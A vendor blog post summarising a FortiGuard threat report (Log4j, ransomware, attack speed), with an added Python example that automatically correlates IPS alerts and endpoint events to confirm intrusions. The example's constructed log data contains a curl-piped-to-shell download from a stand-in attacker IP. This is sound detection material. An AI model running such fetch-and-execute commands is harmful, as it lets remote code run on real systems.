The high-resolution threat intelligence in the latest semiannual FortiGuard Labs Global Threat Landscape Report can be a great help to organizations and IT teams. The report provides deep visibility into the latest cyberattacks, and if the data is acted on promptly it serves as a guide to where IT security should be fortified first.
With many charts and graphics illustrating the tactics, techniques, and procedures (TTPs) attackers use, the report data gives organizations the ability to pinpoint current threats. The findings are drawn from a vast array of network sensors that document billions of threat events every day in live production environments worldwide.
Highlighted in the report are some of the top threats from the second half of 2021:
- Log4j: Despite emerging only in the second week of December (Log4Shell, CVE-2021-44228), exploitation activity escalated quickly enough to make it the most prevalent IPS detection of the entire second half of 2021.
- Threat actors are increasingly adding Linux-based malware to their toolkits, moving it closer and closer to the top shelf.
- The ransomware threat continues to grow in sophistication, aggressiveness, and impact, with no sign of slowing down.
- Botnet trends show a more sophisticated evolution of attack methods.
- Malware trends show cybercriminals maximizing "remote everything."
Threat intelligence is like storm forecasting. It provides organizations with data captured in the real-world and makes them aware of the types of threats that are on the horizon, when to expect them, how they work, and how much havoc they may cause.
When organizations have this kind of visibility, they can better defend against cyberattacks. And just as when a storm is threatening, there is only a short window of time for proactive tasks. Cyberthreats require the same timely preparation that hurricanes or tornadoes do. In the past, IT security professionals may have had months to prepare for a threat, but today's SOCs often have only 48 hours or even much less.
Speed, Speed, Speed…
A key learning from recent threat research is that threat actors are now executing attacks at speeds never witnessed before. Attackers are accelerating through the attack phases, giving defenders little to no time to respond. An increase in attacker pace is alarming because speed kills, especially as the attack surface keeps growing.
This acceleration is forcing organizations to adapt and adopt AI-powered prevention and detection strategies. Cyber defenses that rely on point products and philosophies of "just stop all weaponization of threats" or "just stop execution of effects" are no longer enough: attackers simply have too many different techniques available in their playbook.
The Problem with Point Products
Point products are problematic because they don't "communicate" with other security solutions, and this lack of integration means a lack of total visibility. Another issue with point products is the manual work they impose on the SOC. If a suspicious event is found on Point Product A, it may need to be cross-referenced with Point Product B or Point Product C, or cross-verified against the SIEM. This manual operational legwork has to be done quickly to keep up with how fast the attack is moving.
Clearly, having integration and automation capabilities as part of the analysis process is vital for strong cybersecurity. Taking the manual work out of the process speeds the defensive response and lets analysts stay on task and focus on defending against the attack, rather than spending time checking policies, uploading logs, or other distractions.
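The cross-referencing step described above, as an added example that is not Fortinet's or FortiGuard's code: an IPS alert from one product is automatically joined, on the target host and within a short time window, against endpoint events from a second product, so the analyst receives an already-confirmed hit instead of having to check each console by hand. All log lines, field names and signature names here are constructed for the illustration; the Log4j detection in the sample mirrors the top-threat finding in the report but is not taken from a real sensor.

```python
"""Automated cross-referencing of alerts from two point products.

Added example (not Fortinet's code). A firewall/IPS ("Product A") sees an
exploit attempt against an internal host; an endpoint agent ("Product B") on
that host sees a process start. The manual step the text describes becomes
a time-windowed join on the shared key (the target host's IP). All events
and field names below are constructed assumptions for this example.
"""
import json
from datetime import datetime, timedelta

# Constructed IPS alerts from hypothetical Product A (one JSON object per line).
IPS_ALERTS = [
    '{"ts": "2021-12-11T10:00:05Z", "src": "203.0.113.9", "dst": "10.0.0.7", "sig": "Log4j.JNDI.RCE"}',
    '{"ts": "2021-12-11T10:02:00Z", "src": "198.51.100.4", "dst": "10.0.0.8", "sig": "Log4j.JNDI.RCE"}',
]

# Constructed endpoint process events from hypothetical Product B.
EDR_EVENTS = [
    '{"ts": "2021-12-11T10:00:12Z", "host_ip": "10.0.0.7", "proc": "java", '
    '"child": "/bin/sh", "args": "-c curl http://203.0.113.9/x | sh"}',
    '{"ts": "2021-12-11T10:30:00Z", "host_ip": "10.0.0.8", "proc": "java", '
    '"child": "/usr/bin/gc", "args": ""}',
    '{"ts": "2021-12-11T10:01:00Z", "host_ip": "10.0.0.9", "proc": "sshd", '
    '"child": "/bin/bash", "args": ""}',
]

# Child processes that should not normally be spawned by a Java service.
SHELL_BINARIES = {"/bin/sh", "/bin/bash", "/bin/dash"}


def parse_ts(value):
    """Parse the ISO-8601 UTC timestamps used in the constructed events."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def load(lines):
    """Decode one JSON object per log line."""
    return [json.loads(line) for line in lines]


def correlate(ips_lines, edr_lines, window=timedelta(minutes=5)):
    """Return IPS alerts whose target host spawned a shell from the attacked
    process within `window` after the alert. Each hit also records whether
    the shell's arguments reference the attacking source IP (a second-stage
    download from the same address), which raises confidence further."""
    edr = load(edr_lines)
    hits = []
    for alert in load(ips_lines):
        t0 = parse_ts(alert["ts"])
        for event in edr:
            if event["host_ip"] != alert["dst"]:
                continue  # different host: not the same attack
            if event["child"] not in SHELL_BINARIES:
                continue  # benign child process (e.g. a GC helper)
            lag = parse_ts(event["ts"]) - t0
            if not (timedelta(0) <= lag <= window):
                continue  # outside the window: could be unrelated
            hits.append({
                "dst": alert["dst"],
                "src": alert["src"],
                "sig": alert["sig"],
                "child": event["child"],
                "lag_s": int(lag.total_seconds()),
                "callback_to_src": alert["src"] in event["args"],
            })
    return hits


if __name__ == "__main__":
    for hit in correlate(IPS_ALERTS, EDR_EVENTS):
        print("CONFIRMED:", json.dumps(hit))
```

Run as is, the script reports one confirmed hit: the alert against 10.0.0.7, where a shell was spawned seven seconds later and reached back to the attacking IP. The second alert produces nothing because the only follow-on process on 10.0.0.8 is not a shell, and the shell on 10.0.0.9 is ignored because no IPS alert targeted that host. The window is the key tuning knob: too narrow and a delayed second stage is missed, too wide and unrelated shells get attached to the alert.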
No Let Up in Sight
IT security professionals have always expressed the need for speed in defending against attacks. That message is only going to get louder and continue to be echoed as "everything is happening faster" in cyberattacks. The multitude of techniques cybercriminals use, combined with the increased speed of execution and the sophistication of the threats, is challenging everyone on an enterprise's IT security team.
If an organization hasn't figured out how to fully support and partner across the CISO and IT organizations to improve, fortify, and accelerate intrusion response, it could find itself in the news as the latest victim.
It’s been said before, but it bears repeating: The time to get visibility into the current threat landscape and your cybersecurity posture is now. This isn’t a rogue wave or a one-off. It’s going to be happening again and again. Be ready.
Learn more about Fortinet’s FortiGuard security services portfolio.
As chief security strategist and VP of threat intelligence at Fortinet's FortiGuard Labs, Derek Manky formulates security strategy with more than 17 years of cybersecurity experience. His ultimate goal is to make a positive impact on the global war on cybercrime. Manky provides thought leadership to the industry and has presented research and strategy worldwide at premier security conferences. As a cybersecurity expert, his work has included meetings with leading political figures and key policy stakeholders, including law enforcement, who help define the future of cybersecurity. He is actively involved with several global threat intelligence initiatives, including NATO NICP, the INTERPOL Expert Working Group, the Cyber Threat Alliance (CTA) working committee, and FIRST, all in an effort to shape the future of actionable threat intelligence and proactive security strategy.